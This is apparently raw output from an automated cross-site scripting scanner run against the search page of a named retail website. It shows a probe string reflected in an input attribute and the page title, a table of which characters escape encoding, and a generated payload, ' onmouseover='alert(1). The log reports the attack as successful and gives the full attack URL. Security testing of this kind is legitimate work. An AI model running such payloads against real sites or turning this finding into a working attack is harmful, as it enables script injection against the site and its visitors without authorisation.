https://officedesigns.com/our-products/shop-by-brand

GET Params:[1]
['q']
_______________________________________________________________________________________________________
https://officedesigns.com/nsearch/?q=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [1]
<input id="search"
                       type="search"
                       name="q"
                       value="(uvw&quot;xyz'yxz&lt;/zxy"
                       class="input-text required-entry"
                       maxlength="128"
                       placeholder = "Search entire store here..."
                />

----------------------------------------------------------------------------------
HTML Context: [1]
<title>Search results for &quot;(uvw&quot;xyz'yxz&lt;/zxy&quot;</title>

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False

Attack Payloads for ATTR
["' onmouseover='alert(1)"]

ATTR Attack Url: https://officedesigns.com/nsearch/?q=' onmouseover='alert(1)

=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)
Detection of Payload: 
<input id="search"
                       type="search"
                       name="q"
                       value="' onmouseover='alert(1)"
                       class="input-text required-entry"
                       maxlength="128"
                       placeholder = "Search entire store here..."
                />
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
